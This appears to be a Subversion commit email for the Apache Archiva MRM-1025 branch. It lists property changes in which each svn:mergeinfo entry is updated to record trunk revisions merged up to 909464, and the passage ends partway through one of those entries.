archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/pom.xml (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsFactory.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/ (props changed) archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/test/java/org/apache/archiva/metadata/repository/stats/RepositoryStatisticsManagerTest.java (props changed) archiva/branches/MRM-1025/pom.xml archiva/branches/MRM-1025/skin/src/main/resources/META-INF/maven/site.vm (props changed) archiva/branches/MRM-1025/skin/src/main/resources/css/maven-base.css (props changed) archiva/branches/MRM-1025/skin/src/main/resources/css/print.css (props changed) archiva/branches/MRM-1025/skin/src/main/resources/images/logos/ (props changed) Propchange: archiva/branches/MRM-1025/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements:723609-726925 /archiva/branches/archiva-struts2:699795-705848 /archiva/tags/archiva-1.3:898632 -/archiva/trunk:825850-909070 +/archiva/trunk:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -3,4 +3,4 @@ /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/BaseConsumer.java:699795-705848 /archiva/tags/archiva-1.3/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:898632 -/archiva/trunk/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository:825850-887039,887040-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-909070* +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing:825850-882054,882055-909464* Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:699795-705848 -/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:825850-909070 +/archiva/trunk/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java:825850-909464 Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 15:53:49 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources:723609-726925 